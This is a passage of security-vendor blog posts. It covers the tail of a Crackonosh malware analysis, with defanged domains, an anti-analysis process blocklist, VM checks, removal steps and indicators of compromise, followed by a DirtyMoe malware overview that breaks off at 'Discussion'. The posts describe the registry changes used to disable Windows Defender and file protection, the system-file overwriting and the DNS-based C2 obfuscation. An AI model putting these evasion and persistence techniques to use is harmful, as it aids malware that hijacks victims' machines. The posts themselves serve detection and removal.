  • pol[.]motorcyclesonthehighway[.]com
  • any[.]andycopyprinter[.]net
  • onl[.]andycopyprinter[.]net
  • cvh[.]cheapjewelleryathome[.]info
  • df[.]dvdstoreshopper[.]org
  • efr[.]dvdstoreshopper[.]org
  • Sdf[.]expensivecarshomerepair[.]com

It seems, that these files are not yet in the wild, but we know what the names of files should be 

C:\WINDOWS\System32\wrsrvrcomd0.dll, C:\WINDOWS\System32\winupdtemp_0.dat and C:\WINDOWS\System32\winuptddm0.

Anti-Detection and Anti-Forensics

As noted before, Crackonosh takes specific actions to evade security software and analysis.

Specific actions it takes to evade and disable security software includes:

  • Deleting antivirus software in safe mode
  • Stopping Windows Update
  • Replacing Windows Security with green tick system tray icon
  • Using libraries that don’t use the usual DllMain that is used when running library as the main executable (by rundll32.exe) but instead are started with some other exported functions.
  • Serviceinstaller tests if it is running in Safe mode

To protect against analysis, it takes the following actions to test to determine if it’s running in a VM:

  • Checks registry keys:
    • SOFTWARE\VMware, Inc
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters
    • SOFTWARE\Oracle\VirtualBox Guest Additions
  • Test if computer time is in some reasonable interval e.g. after creation of malware and before 2023 (wksprtcli.dll)

Also, as noted it delays running to better hide itself. We found the specific installers used hard coded dates and times for its delay as shown below.

SHA of installer Installer doesn’t run before
9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3 2018-06-10 13:08:20
8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05 2018-06-19 14:06:37
93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0 2018-07-04 17:33:20
6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584 2018-07-10 15:35:57
4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71 2018-07-25 13:56:35
65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A 2018-08-03 15:50:40
C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1 2018-08-14 12:36:30
7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4 2018-09-13 12:29:50
D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A 2018-10-01 13:52:22
E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF 2018-10-19 14:15:35
D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB 2018-11-07 12:47:30
Hardcoded timestamps in installers

We also found a version, Winrmsrv.exe (5B85CEB558BAADED794E4DB8B8279E2AC42405896B143A63F8A334E6C6BBA3FB), that instead decrypts time that is hard-coded in config file (for example in 5AB27EAB926755620C948E7F7A1FDC957C657AEB285F449A4A32EF8B1ADD92AC ) is 2020-02-03. If current system time is lower than the extracted value, winrmsrv.exe doesn’t run.

It also takes specific actions to hide itself from possible power users who use tools that could disclose its presence.

It uses Windows-like names and descriptions such as winlogui.exe which is the Windows Logon GUI Application.

It also checks running processes and compares it to the blocklist below. If it finds process with specified name winrmsrv.exe and winlogui.exe terminate itself and wait until the next start of PC.

  • Blocklist:
    • dumpcap.exe
    • fiddler.exe 
    • frst.exe 
    • frst64.exe 
    • fse2.exe 
    • mbar.exe 
    • messageanalyzer.exe 
    • netmon.exe 
    • networkminer.exe 
    • ollydbg.exe 
    • procdump.exe 
    • procdump64.exe 
    • procexp.exe 
    • procexp64.exe 
    • procmon.exe 
    • procmon64.exe 
    • rawshark.exe 
    • rootkitremover.exe 
    • sdscan.exe 
    • sdwelcome.exe 
    • splunk.exe 
    • splunkd.exe 
    • spyhunter4.exe 
    • taskmgr.exe
    • tshark.exe 
    • windbg.exe 
    • wireshark-gtk.exe 
    • wireshark.exe 
    • x32dbg.exe 
    • x64dbg.exe 
    • X96dbg.exe

Additional files

As well as previously discussed, our research found additional files:

  • Startupcheck.vbs: a one time script to create a Windows Task Scheduler task for StartUpCheckLibrary.dll.
  • Winlogui.dat, wslogon???.dat: temporary files to be moved as new winlogui.exe.
  • Perfdish001.dat: a list of infected IP addresses winrmsrv.exe found.
  • Install.msi and Install.vbs: these are in some versions a step between maintenance.vbs and serviceinstaller.msi, containing commands that are otherwise in maintenance.vbs.

Removal of Crackonosh

Based on our analysis, the following steps are required to fully remove Crackonosh.

Delete the following Scheduled Tasks (Task Schedulers)

  • Microsoft\Windows\Maintenance\InstallWinSAT
  • Microsoft\Windows\Application Experience\StartupCheckLibrary
  • Microsoft\Windows\WDI\SrvHost\
  • Microsoft\Windows\Wininet\Winlogui\
  • Microsoft\Windows\Windows Error Reporting\winrmsrv\

Delete the following files from c:\Windows\system32\

  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
  • diskdriver.exe
  • maintenance.vbs
  • serviceinstaller.exe
  • serviceinstaller.msi
  • startupcheck.vbs
  • startupchecklibrary.dll
  • windfn.exe
  • winlogui.exe
  • winrmsrv.exe
  • winscomrssrv.dll
  • wksprtcli.dll

Delete the following file from C:\Documents and Settings\All Users\Local Settings\Application Data\Programs\Common (%localappdata%\Programs\Common)

  • UserAccountControlSettingsDevice.dat

Delete the following file from C:\Program Files\Windows Defender\

  • MSASCuiL.exe

Delete the following Windows registry keys (using regedit.exe)

  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender value DisableAntiSpyware
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableBehaviorMonitoring
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableOnAccessProtection
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableScanOnRealtimeEnable
  • HKLM\SOFTWARE\Microsoft\Security Center value AntiVirusDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value FirewallDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value UpdatesDisableNotify
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value HideSCAHealth
  • HKLM\SOFTWARE\Microsoft\Windows Defender\Reporting value DisableEnhancedNotifications
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value winlogui

Restore the following default Windows services (Note: depends on your OS version – see https://www.tenforums.com/tutorials/57567-restore-default-services-windows-10-a.html)

  • wuauserv
  • SecurityHealthService
  • WinDefend
  • Sense
  • MsMpSvc

Reinstall Windows Defender and any third-party security software, if any was installed.

Error messages

On infected machines, sometimes the following error messages about the file Maintenance.vbs can appear.

Type Mismatch: ‘CInt’, Code: 800A000D
Can not find script file

Both of these are bugs in the Crackonosh installation.

Although there are some guides on the internet on how to resolve these errors, instead we recommend following the steps in the previous chapter to be sure you fully remove all traces of Crackonosh.

Conclusion

Crackonosh installs itself by replacing critical Windows system files and abusing the Windows Safe mode to impair system defenses.

This malware further protects itself by disabling security software, operating system updates and employs other anti-analysis techniques to prevent discovery, making it very difficult to detect and remove.

In summary, Crackonosh shows the risks in downloading cracked software and demonstrates that it is highly profitable for attackers. Crackonosh has been circulating since at least June 2018 and has yielded over $2,000,000 USD for its authors in Monero from over 222,000 infected systems worldwide.

As long as people continue to download cracked software, attacks like these will continue to be profitable for attackers. The key take-away from this is that you really can’t get something for nothing and when you try to steal software, odds are someone is trying to steal from you.

Indicators of Compromise (IoCs)

Public keys

—–BEGIN PUBLIC KEY—–
MIIEIjANBgkqhkiG9w0BAQEFAAOCBA8AMIIECgKCBAEA0m9mblXlLhgH/d5WgDw0
2nzOynQvKdkobluX5zFK6ewVkX+3W6Vv2v4CqJ473ti9798Jt9jkDpfEL1yMUDfp
Lp1p4XGVSrTrD16J0Guxx0yzIjyReAzJ8Kazej1z/XGGOtAMZCoLI+TrE4me3SjL
+EXk3pXqyupAgKFiNrlXRj7hbb5vXkeB0MpbV3yJ0ha1OJdAIAwGzQTUsvDWDw00
4sxLfso6CLzR1CKJEH2wT6RVfalnGg6IBwb/fvGewGYECAfnPtEt8TwvzuLsw6NY
BD+tDNcFQk0ZRIAZ+zO5mY4cuWTTBZbAjEFFo5UX4ognHDElltgh+76rXDvtXmeZ
ivDOgJSBXr2+TkQ9dMfYMYLxKHoe8WRBYlI6Wkl59+HQQdQFgSGK6tFtY0T3TVwR
ZxQE1LYwe+0lF1Cop8U/jqRotudKcS+Hyiu0yoSv34C3QwW4ELQktCX5313gcNF/
RA98knE1tl9F3Pl6vnvm1ILb6cxihYy5F0rdLteRNezrjcXOKGA9BV4QTebxH/mi
mm6z4BtTBPNKvrtqo25qx5Oa0fOnVvHAaVtXNjzCNapZwucHH/V8jJzIwcv2ZUP4
Hx9Hkpm5u/3payfDPkWHFwxh3qfDDr2jzgwDjRSOgO1GHGuL1HoIxSgxWFOf6F2z
caOwDrcycDbWiIMeZedJQI1XTrCPoFL4YoyPY2at9tAYW+6Z3gvnvbhen803N2/k
0TWEUU1hUfhOn45IC5r3pCC8Ouy7FIblz1wGm8Qfa8uSD3hxPhaev1G2JJpN4ZVN
UEfeVH6rVcsbQmKoB0xgmcn5Qnq4WoRGtTd1Z4bbC2Zl2q4jqDAutxWdtmEahmcN
OZoTpAjfN96eQReDYLHYkY9SmdjmclnXGo6SP2VHdlm+Xf5DU7E+0c1WNNb2fGN8
+XY29XLuesCppPyeCejMEgIIfIm6A0ltRtwdRHzqgLaY3o6Q6KTvMCQY2zEwKvx8
h1u5CLNpJ0yajbvaO41g4uKBtAPL+N9knsfnIqwG1r7emocrUbj3Nou9mPvtTVHr
r6ZRCmXbdhXTFL6ztLEGYt4wYwvJfKXlgk+3LFECffw0LpjUXEJVtzb//eI4rEyq
J99exvMzQJ5ELLwpRT/Ehq4D7ngc5V/LGQvGNG5MUnzjDF5Ja5W56HcYRVCj8+CV
jHzOUMx1Ojzeb9L87dS+neATWLr+26kMBALr7lEi37483oLQcD5W4bKspQmMdOJb
ED8MEVTd1V6/lTfcBRiHmEdHazV6OnxZsriXQ6MQtnS5WYKjaCwnv2QfUAtfspeO
tGeIalZIdY/MpABHnmhOQZc5rRXrsEU028zmD52OXTXVfnklhhZjHm9QOX6D4fM3
kQIDAQAB
—–END PUBLIC KEY—–
—–BEGIN PUBLIC KEY—–
MIIEfDANBgkqhkiG9w0BAQEFAAOCBGkAMIIEZAKCBFsAuwkH5cn5zS75ZQpdViD/
L5gUpjnJXJL1rWB0toEICF58mkjpR8DGR+Nl3IXgyjSdKprFUU7pVhO5kmlgiId/
VqbBQZdwKaLxi4oeg4zzVQ7ACwanU1eYqOCNoAsrdcuWkytnPUcLRC3VtE5POp1n
skiPiKNt4aWvzXw61+o+ROEQhKcsYaB3Xu34X1HPxI1HSFhPLxuj20Gfiu3Aol3r
mGdxLWa/sVbkYzyinocrVRl09+Tys0JYq1hc+q6ZR3fN1wOqOQm7dlksmPLDAhIi
9AFyKPrdiLc30kpMP3dpZT/IilkRebcrlufiDgXpAij2t6zzHC5cjn4eCOV80kzJ
qgw8oMAww0K2jvhwTWlRkvvAWtkbHUL9VRX69NFAJOuAPsHNv7ScWiy4EW4KxlFd
zR0B6hzsOc/bo0ns5ffrtOFPao1yW7h4BqE8AYpENwKmygQCh+e211Gd0ABD4131
nNYuZokyYXLLEuzwEjzJlw0bKbwn6suVPA8WAa53iy43/5LWQFfWB3AK8qolJ6ck
vyNLJiMtMa1Q+K3pcRndfQpLMsI19ZZyz67Rh0T+QqDt2XQ5gT4gnmPlc2wB3Y7X
2XoZHQZ8FRgYxhS2Szurmn/70NeZEq6p4Zr+yj0FqEjNvR1ooUz5pwJ6iJSmXRtN
ifaBHKhmc4l5ZIUOUkhtsQ1bmsII092gtLPrLkU7hC1hG9vSzUEh6myLs/pqIKTj
x+s+tHqF34XuvNMJOAcv7dXIiQ0QqfG1bFFP6WItwNyeRRGVIkik6GZuAe3lXV5d
bcKr+ID6pZBeI+yN6y+ugX900WZHKZCfSWvAEQDDZW7TCe0sBQpq083B1GVQOg9t
3MM43PqdYrVgH0fRYa6YJ0SrvhFEIjaevszmOYo+eE5P3GHuL4ty45LrkE91qTWk
fYexEQ0QhCsmBFCu+oX/EI6NpAm636zoc9qPZScZBgIAStYCJJt6pIzDr3tq0BFR
oA3CklsFrKloDgx3rBZgNJk4lpWd9kihNRq7EzI8Y/YbAA0SlgkfXj6/4s0B0ODi
2xirUJzhzQnJuvXFdirwoRpHglMtIOhmfy0fMnvorDbmxGyMVM4n44nGLLrqaZj1
+8QWi9PixPNWgznPBeQaT7q78IPooWn9H/efJ2Rb602iW8H9NSbp/Mt2+Qa4O2Cg
ATymvrRG6oyCgNF5L1fUpGQNQpD3PzSyrTdyjEIabjPpPD+doXPq3y+sEYvWVwDc
96SwVSB7oZ3Bj4/tW7IJ4FhPzXcrBl0RsdURHHhJsHPHSQH6QRtebKcc+3TemhN5
CcXjHmETcB0a0FJ6DXNm4iQZx+t/q8F0ZYnBGhR7aAYu5wl5ofJxGFTQkc5KisYh
B6XogfPM7GT5Zw2B7omiXiGHKALXerzQP831+gL8Zso6ZIWGM3F+PJqQarfn0wnT
xQ264rjtnSKnSkfaDRGxpBYyMDF3CxMPHYsmv7K5lF4be5ASK64VexloUQIDAQAB
—–END PUBLIC KEY—–

The post Crackonosh: A New Malware Distributed in Cracked Software appeared first on Avast Threat Labs.

DirtyMoe: Introduction and General Overview of Modularized Malware

16 June 2021 at 11:56

Abstract

The rising price of the cryptocurrency has caused a skyrocketing trend of malware samples in the wild. DDoS attacks go hand in hand with the mining of cryptocurrencies to increase the attackers’ revenue/profitability. Moreover, the temptation grows if you have thousands of victims at your disposal.

This article presents the result of our recent research on the DirtyMoe malware. We noticed that the NuggetPhantom malware [1] had been the first version of DirtyMoe, and PurpleFox is its exploit kit [2]. We date the first mention of the malware to 2016. The malware has followed a  fascinating evolution during the last few years. The first samples were often unstable and produced obvious symptoms. Nonetheless, the current samples are at par with other malware in the use of anti-forensic, anti-tracking, and anti-debugging techniques nowadays.

The DirtyMoe malware uses a simple idea of how to be modularized, undetectable, and untrackable at the same time. The aim of this malware is focused on Cryptojacking and DDoS attacks. DirtyMoe is run as a Windows service under system-level privileges via EternalBlue and at least three other exploits. The particular functionality is controlled remotely by the malware authors who can reconfigure thousands of DirtyMoe instances to the desired functionality within a few hours. DirtyMoe just downloads an encrypted payload, corresponding to the required functionality, and injects the payload into itself.

DirtyMoe’s self-defense and hiding techniques can be found at local and network malware layers. The core of the DirtyMoe is the service that is protected by VMProtect. It extracts a Windows driver that utilizes various rootkit capabilities such as service, registry entry, and driver hiding. Additionally, the driver can hide selected files on the system volume and can inject an arbitrary DLL into each newly created process in the system. The network communication with a mother server is not hard-coded and is not invoked directly. DirtyMoe makes a DNS request to one hard-coded domain using a set of hardcoded DNS servers. However,  the final IP address and port are derived using another sequence of DNS requests. So, blocking one final IP address does not neutralize the malware, and we also cannot block DNS requests to DNS servers such as Google, Cloudflare, etc.

This is the first article of the DirtyMoe series. We present a high-level overview of the complex DirtyMoe’s architecture in this article. The following articles will be focused on detailed aspects of the DirtyMoe architecture, such as the driver, services, modules, etc. In this article, We describe DirtyMoe’s kill chain, sophisticated network communication, self-protecting techniques, and significant symptoms. Further, we present statistical information about the prevalence and location of the malware and C&C servers. Finally, we discuss and summarize the relationship between DirtyMoe and PurpleFox. Indicators of Compromise lists will be published in future posts for each malware component.

1. Kill Chain

The following Figures illustrate two views of DirtyMoe architecture. The first one is delivery and the second one is exploration including installation. Individual Kill Chain items are described in the following subsections.

Figure 1. Kill Chain: Delivery
Figure 2. Kill Chain: Exploitation and Installation

1.2 Reconnaissance

Through port-scanning and open-database of vulnerabilities, the attackers find and target a large number of weak computers. PurpleFox is the commonly used exploit kit for DirtyMoe.

1.3 Weaponization

The DirtyMoe authors apply several explicit techniques to gain admin privileges for a DirtyMoe deployment.

One of the favorite exploits is EternalBlue (CVE-2017-0144), although this vulnerability is well known from 2017. Avast still blocks around 20 million EternalBlue attack attempts every month. Unfortunately, a million machines still operate with the vulnerable SMBv1 protocol and hence opening doors to malware include DirtyMoe via privilege escalation [3]. Recently, a new infection vector that cracks Windows machines through SMB password brute force is on the rise [2].

Another way to infect a victim machine with DirtyMoe is phishing emails containing URLs that can exploit targets via Internet Explorer; for instance, the Scripting Engine Memory Corruption Vulnerability (CVE-2020-0674). The vulnerability can inject and damage memory so that executed code is run in the current user context. So, if the attacker is lucky enough to administrator user login, the code takes control over the affected machine [4]. It is wondering how many users frequently use Internet Explorer with this vulnerability.

Further, a wide range of infected files is a way to deploy DirtyMoe. Crack, Keygen, but even legit-looking applications could consist of malicious code that installs malware into victim machines as a part of their execution process. Customarily, the malware installation is done in the background and silently without user interaction or user’s knowledge. Infected macros, self-extracting archive, and repacked installers of popular applications are the typical groups.

We have given the most well-known examples above, but how to deploy malware is unlimited. All ways have one thing in common; it is Common Vulnerabilities and Exposures (CVE). Description of the exact method to install DirtyMoe is out of this article’s scope. However, we list a shortlist of used CVE for DirtyMoe as follows:

  • CVE-2019-1458, CVE-2015-1701, CVE-2018-8120: Win32k Elevation of Privilege Vulnerability
  • CVE-2014-6332: Windows OLE Automation Array Remote Code Execution Vulnerability

1.4 Delivery

When one of the exploits is successful and gains system privileges, DirtyMoe can be installed on a victim’s machine. We observe that DirtyMoe utilizes Windows MSI Installer to deploy the malware. MSI Installer provides an easy way to install proper software across several platforms and versions of Windows. Each version requires a different location of installed files and registry entries. The malware author can comfortably set up DirtyMoe configurations for the target system and platform.

1.4.1 MSI Installer Package

The malware authors via MSI installer prepare a victim environment to a proper state. They focus on disabling anti-spyware and file protection features. Additionally, the MSI package uses one system feature which helps to overwrite system files for malware deployment.

Registry Manipulation

There are several registry manipulations during MSI installation. The most crucial registry entries are described in the following overview:

  • Microsoft Defender Antivirus can be disabled by the DisableAntiSpyware registry key set to 1.
    • HKCU\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
  • Windows File Protection (WFP) of critical Windows system files is disabled.
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan
  • Disables SMB sharing due to the prevention of another malware infection
    • HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SMBDeviceEnabled
  • Replacing system files by the malware ones
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AllowProtectedRenames
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
  • Sets the threshold to the maximum value to ensure that each service is run as a thread and the service is not a normal process.
    • HKLM\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB

File Manipulation

The MSI installer copies files to defined destinations if an appropriate condition is met, as the following table summarizes.

File Destination Condition
sysupdate.log WindowsFolder Always
winupdate32.log WindowsFolder NOT VersionNT64
winupdate64.log WindowsFolder VersionNT64

Windows Session Manager (smss.exe) copies the files during Windows startup according to registry value of PendingFileRenameOperations entry as follows:

  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[SystemFolder]\\sens.dll to \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[WindowsFolder]\\winupdate[64,32].log to \\[SystemFolder]\\sens.dll
  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Ke583427.xsl
  • Move \\[WindowsFolder]\\sysupdate.log to \\[WindowsFolder]\\AppPatch\\Ke583427.xsl

1.4.2 MSI Installation

The MSI installer can be run silently without the necessity of the user interaction. The installation requires the system restart to apply all changes, but the MSI installer supports delayed restart, and a user does not detect any suspicious symptoms. The MSI installer prepares all necessary files and configurations to deploy the DirtyMoe malware. After the system reboot, the system overwrites defined system files, and the malware is run. We will describe the detailed analysis of the MSI package in a separate article.

1.5 Exploitation

The MSI package overwrites the system file sens.dll via the Windows Session Manager. Therefore, DirtyMoe abuses the Windows System Event Notification (SENS) to be started by the system. The infected SENS Service is a mediator which deploys a DirtyMoe Service.

In the first phase, the abused service ensures that DirtyMoe will be loaded after the system reboot and restores the misused Windows service to the original state. Secondly, the main DirtyMoe service is started, and a rootkit driver hides the DirtyMoe’s services, registry entries, and files.

1.5.1 Infected SENS Service

Windows runs the original SENS under NT AUTHORITY\SYSTEM user. So, DirtyMoe gains system-level privileges. DirtyMoe must complete three basic objectives on the first run of the infected SENS Service.

  1. Rootkit Driver Loading
    DirtyMoe runs in user mode, but the malware needs support from the kernel space. Most kernel actions try to hide or anti-track DirtyMoe activities. A driver binary is embedded in the DirtyMoe service that loads the driver during DirtyMoe starts.
  2. DirtyMoe Service Registration
    The infected SENS Service registers the DirtyMoe Service in the system as a regular Windows service. Consequently, the DirtyMoe malware can survive the system reboot. The DirtyMoe driver is activated at this time; hence the newly created service is hidden too. DirtyMoe Service is the main executive unit that maintains all malware activities.
  3. System Event Notification Service Recovery
    If the DirtyMoe installation and service deployment is successful, the last step of the infected SENS Service is to recover the original SENS service from the Acpsens.dll backup file; see File Manipulation.

1.5.2 DirtyMoe Service

DirtyMoe Service is registered in the system during the maware’s deployment. At the start, the service extracts and loads the DirtyMoe driver to protect itself. When the driver is loaded, the service cleans up all evidence about the driver from the file system and registry.

The DirtyMoe malware is composed of two processes, namely DirtyMoe Core and DirtyMoe Executioner, created by DirtyMoe service that terminates itself if the processes are created and configured. DirtyMoe Service creates the Core and Executioner process through several processes and threads that are terminated over time. Forensic and tracking methods are therefore more difficult. The DirtyMoe services, processes, and their details will be described in the future article in detail.

1.6 Installation

All we described above is only preparation for malicious execution. DirtyMoe Core is the maintenance process that manages downloading, updating, encrypting, backuping, and protecting DirtyMoe malware. DirtyMoe Core is responsible for the injection of malicious code into DirtyMoe Executioner that executes it. The injected code, called MOE Object or Module, is downloaded from a C&C server. MOE Objects are encrypted PE files that DirtyMoe Core decrypts and injects into DirtyMoe Executioner.

Additionally, the initial payload that determines the introductory behavior of DirtyMoe Core is deployed by the MSI Installer as the sysupdate.log file. Therefore, DirtyMoe Core can update or change its own functionality by payload injection.

1.7 Command and Control

DirtyMoe Core and DirtyMoe Executioner provide an interface for the malware authors who can modularize DirtyMoe remotely and change the purpose and configuration via MOE Objects. DirtyMoe Core communicates with the command and control (C&C) server to obtain attacker commands. Accordingly, the whole complex hierarchy is highly modularized and is very flexible to configuration and control.

The insidiousness of the C&C communication is that DirtyMoe does not use fixed IP addresses but implements a unique mechanism to obfuscate the final C&C server address. So, it is impossible to block the C&C server on a victim’s machine since the server address is different for each C&C communication. Moreover, the mechanism is based on DNS requests which cannot be easily blocked because it would affect everyday communications.

1.8 Actions on Objective

Regarding DirtyMoe modularization, crypto-mining seems to be a continuous activity that uses victim machines permanently if malware authors do not need to make targeted attacks. So, crypto-mining is an activity at a time of peace. However, the NSFOCUS Threat Intelligence center discovered distributed denial-of-service (DDoS) attacks [1]. In general, DirtyMoe can deploy arbitrary malware into infected systems, such as information stealer, ransomware, trojan, etc.

2. Network Communication

As we announced, the network communication with the C&C server is sophisticated. The IP address of the C&C server is not hardcoded because it is derived from DNS requests. There are three pieces of information hardcoded in the code.

  1. A list of public DNS servers such as Google, Cloudflare, etc.
  2. A hard-coded domain rpc[.]1qw[.]us is an entry point to get the final IP address of the C&C server.
  3. Bulgarian constants1) that are used for a translation of IP addresses.

A DNS request to the 1qw[.]us domain returns a list of live servers, but it is not the final C&C server. DirtyMoe converts the returned IP address to integer and subtracts the first Bulgarian constant (anything making the result correct) to calculate the final C&C IP address. A C&C port is also derived from the final IP address using the second Bulgarian’s constant to make things even worse.

The insidiousness of the translation is an application of DNS requests that cannot be easily blocked because users need the IP translations. DirtyMoe sends requests to public DNS servers that resolve the 1qw[.]us domain recursively. Therefore, user machines do not contact the malicious domain directly but via one of the hardcoded domain name servers. Moreover, the list of returned IP addresses is different for each minute. 

We record approx. 2,000 IP addresses to date. Many translated IP addresses lead to live web servers, mostly with Chinese content. It is unclear whether the malware author owns the web servers or the web servers are just compromised by DirtyMoe.

3. Statistics

According to our observation, the first significant occurrence of DirtyMoe was observed in 2017. The number of DirtyMoe hits was in the thousands between 2018 – 2020.

3.1 DirtyMoe Hits

The increase of incidences has been higher in orders of magnitude this year, as the logarithmic scale of Figure 3 indicates. On the other hand, it must be noted that we have improved our detection for DirtyMoe in 2020. We record approx. one hundred thousand infected and active machines to date. However, it is evident that DirtyMoe malware is still active and on the rise. Therefore, we will have to watch out and stay sharp.

Figure 3. Annual occurrences of DirtyMoe hits

The dominant county of DirtyMoe hits is Russia; specifically, 65 k of 245 k hits; see Figure 4. DirtyMoe leads in Europe and Asia, as Figure 5 illustrates. America also has a significant share of hits.

Figure 4. Distribution of hits in point of the country view
Figure 5. Distribution of hits in point of the continent view

3.2 C&C Servers

We observed the different distribution of countries and continents for C&C servers (IP addresses) and sample hits. Most of the C&C servers are located in China, as Figures 6 and 7 demonstrate. We can deduce that the location of the malware source is in China. It is evident that the malware authors are a well-organized group that operates on all major continents.

Figure 6. Distribution of C&C servers in point of the country view
Figure 7. Distribution of C&C servers in point of the continent view

3.3 VMProtect

In the last two years, DirtyMoe has used a volume ID of the victim’s machines as a name for the service DLL. The first versions of DirtyMoe applied a windows service name selected at random. It was dominant in 2018; see Figure 8.

Figure 8. Distribution of cases using service names

We detected the first significant occurrence of VMProtect at the end of 2018. The obfuscation via VMprotect has been continuously observed since 2019. Before VMProtect, the malware authors relied on common obfuscation methods that are still present in the VMProtected versions of DirtyMoe.

4. Self Protecting Techniques

Every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. DirtyMoe uses rootkit methods to hide system activities. Obfuscation is implemented via the VMProtect software and via its own encrypting/decrypting algorithm. Network communications are utilized by a multilevel architecture so that no IP addresses of the mother servers are hardcoded. Last but not least is the protection of DirtyMoe processes to each other.

4.1 DirtyMoe Driver

 The DirtyMoe driver provides a wide scale of functionality; see the following shortlist:

  • Minifilter: affection (hide, insert, modify) of a directory enumeration
  • Registry Hiding: can hide defined registry keys
  • Service Hiding: patches service.exe structures to hide a required service
  • Driver Hiding: can hide itself in the system

The DirtyMoe driver is a broad topic that we will discuss in a future post.

4.2 Obfuscation and VMProtect

DirtyMoe code contains many malicious patterns that would be caught by most AV. The malware author used VMprotect to obfuscate the DirtyMoe Service DLL file. DirtyMoe Objects that download are encrypted with symmetric ciphers using hardcoded keys. We have seen several MOE objects which contained, in essence, the same PE files differing in PE headers only. Nevertheless, even these slight modifications were enough for the used cipher to produce completely different MOE objects. Therefore, static detections cannot be applied to MOE encrypted objects. Moreover, DirtyMoe does not dump a decrypted MOE object (PE file) into the file system but directly injects the MOE object into the memory.

DirtyMoe stores its configuration in registry entry as follows: HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D

The configuration values are also encrypted by the symmetric cipher and hardcoded key. Figure 9 demonstrates the decryption method for the DirectPlay8\Direct3D registry key. A detailed explanation of the method will be published in a future post.

Figure 9. Decryption method for the Direct3D registry value

4.3 Anti-Forensic and Protections

As we mentioned in the Exploitation section, the forensic and tracking methods are more complicated since DirtyMoe workers are started over several processes and threads. The workers are initially run as svchost.exe, but the DirtyMoe driver changes the worker’s process names to fontdrvhost.exe. DirtyMoe has two worker processes (Core and Executioner) that are guarded to each other. So, if the first worker is killed, the second one starts a new instance of the first one and vice versa.

5. Symptoms and Deactivation

Although DirtyMoe uses advanced protection and anti-forensics techniques, several symptoms indicate the presence of DirtyMoe.

5.1 Registry

The marked indicator of DrityMoe existence is a registry key HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D.
The DirtyMoe stores the configuration in this registry key.

Additionally, if the system registry contains duplicate keys in the path HKLM\SYSTEM\CurrentControlSet\Services, it can point to unauthorized manipulation in the Windows kernel structures. The DirtyMoe driver implements techniques to hide registry keys that can cause inconsistency in the registry.

The MSI installer leaves the following flag if the installation is successful:
HKEY_LOCAL_MACHINE\SOFTWARE\SoundResearch\UpdaterLastTimeChecked[1-3]

5.2 Files

The working directory of DirtyMoe is C:\Windows\AppPatch. The DirtyMoe malware backups the original SENS DLL file to the working directory under the Acpsens.dll file.

Rarely, the DirtyMoe worker fails during .moe file injection, and the C:\Windows\AppPatch\Custom folder may contain unprocessed MOE files.

Sometimes, DirtyMoe “forgot” to delete a temporary DLL file used for the malware deployment. The temporary service is present in Windows services, and the service name pattern is ms<five-digit_random_number>app. So, the System32 folder can contain the DLL file in the form: C:\Windows\System32\ms<five-digit-random-number>app.dll

The MSI installer often creates a directory in C:\Program Files folder with the name of the MSI product name:
FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH or a similar format: [A-Z]{36}

5.3 Processes

On Windows 10, the DirtyMoe processes have no live parent process since the parent is killed due to anti-tracking. The workers are based on svchost.exe. Nonetheless, the processes are visible as fontdrvhost.exe under SYSTEM users with the following command-line arguments:

svchost.exe -k LocalService
svchost.exe -k NetworkService

5.4 Deactivation

It is necessary to stop or delete the DirtyMoe service named Ms<volume-id>App. Unfortunately, the DirtyMoe driver hides the service even in the safe mode. So, the system should be started via any installation disk to avoid the driver effect and then remove/rename the service DLL file located in C:\Windows\System32\Ms<volume-id>App.dll.

Then, the DirtyMoe service is not started, and the following action can be taken:

  • Remove Ms<volume-id>App service
  • Delete the service DLL file
  • Remove the core payload and their backup files from C:\Windows\AppPatch
    • Ke<five-digit_random_number>.xsl and Ac<volume-id>.sdb
  • Remove DirtyMoe Objects from C:\Windows\AppPatch\Custom
    • <md5>.mos; <md5>.moe; <md5>.mow

6. Discussion

